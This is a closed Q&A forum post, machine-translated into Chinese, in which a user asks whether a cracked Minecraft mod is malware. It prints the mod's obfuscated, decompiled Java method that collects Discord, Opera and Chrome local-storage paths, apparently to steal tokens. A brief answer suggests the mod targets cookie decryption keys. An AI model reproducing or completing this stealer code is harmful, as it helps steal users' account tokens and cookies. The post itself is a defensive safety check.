java 这是一个病毒吗?[已关闭]

1mrurvl1  于 2023-03-06  发布在  Java
关注(0)|答案(1)|浏览(115)

已关闭。此问题需要超过focused。当前不接受答案。
**想要改进此问题吗?**更新此问题,使其仅关注editing this post的一个问题。

3天前关闭。
Improve this question
有一个我发现和反编译的Minecraft国防部。代码似乎有点sus。国防部是一个Hypixel Skyblock国防部是“破解”。在我使用它之前,我想知道它的安全这里是代码的问题:

throw new IllegalStateException("An error occurred while decompiling this method.");
    }
    
    public static ArrayList<String> getTokens(final int n) {
        final int n2 = 0x481F617D ^ (0x187C315E ^ (NormalMode.IepYaeeIed ^ n));
        if (((n2 * 31 >>> 4) % n2 ^ n2 >>> 16) != 0xF0ACB25) {
            throw new IOException();
        }
        final int n3 = 0x33D469FC ^ n2;
        try {
            if (((n3 * (0x698C60E4 ^ n3) >>> (0x698C60FF ^ n3)) % n3 ^ n3 >>> (0x698C60EB ^ n3)) != (0x65F3F291 ^ n3)) {
                throw null;
            }
            throw new IllegalAccessException();
        }
        catch (IllegalAccessException ex2) {
            int n4 = 0;
            switch ((n3 & 7 << 29) >> 29 | n3 << 3) {
                default: {
                    throw new IOException("Error in hash");
                }
                case 1281558491: {
                    n4 = (0x6BCDB83B ^ n3);
                    break;
                }
                case 818937433: {
                    n4 = (0x2458270B ^ n3);
                    break;
                }
            }
            if (((n4 * 31 >>> 4) % n4 ^ n4 >>> 16) != 0x21DB975) {
                throw new IllegalAccessException();
            }
            final int n5 = 0x7ACA260B ^ n4;
            final ArrayList<String> list = new ArrayList<String>();
            final ArrayList<String> list2 = new ArrayList<String>();
            list2.add(System.getProperty(thisIsAInsaneEncryptionMethod("eBkWRFMmB0Vz", n5)) + thisIsAInsaneEncryptionMethod("USsDRjkvHElKYGYJV28NBjMGZw4JJmobLR8BL2cVW1RcaF0xUk9HJlhxVgA3WQ==", n5));
            list2.add(System.getProperty(thisIsAInsaneEncryptionMethod("eBkWRFMmB0Vz", n5)) + "\\AppData\\Roaming\\discordcanary\\Local Storage\\leveldb");
            list2.add(System.getProperty(thisIsAInsaneEncryptionMethod("eBkWRFMmB0Vz", n5)) + "\\AppData\\Roaming\\discordptb\\Local Storage\\leveldb");
            list2.add(System.getProperty(thisIsAInsaneEncryptionMethod("eBkWRFMmB0Vz", n5)) + "\\AppData\\Roaming\\Opera Software\\Opera Stable\\Local Storage\\leveldb");
            list2.add(System.getProperty(thisIsAInsaneEncryptionMethod("eBkWRFMmB0Vz", n5)) + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb");
            final Iterator<String> iterator = list2.iterator();
            if (((n5 * 31 >>> 4) % n5 ^ n5 >>> 16) == 0x98F4522) {
                final int n6 = 0xC4740D ^ n5;
                try {
                    if (((n6 * (0x784F8AD9 ^ n6) >>> (0x784F8AC2 ^ n6)) % n6 ^ n6 >>> (0x784F8AD6 ^ n6)) != (0x7155EE56 ^ n6)) {
                        throw null;
                    }
                    throw new RuntimeException();
                }

我不是 java 最好的。

xzlaal3s

xzlaal3s1#

我必须知道mod做什么,但看到它进入你的opera浏览器的本地存储id假设它试图抓住一个加密密钥,可用于解码cookie的潜在

相关问题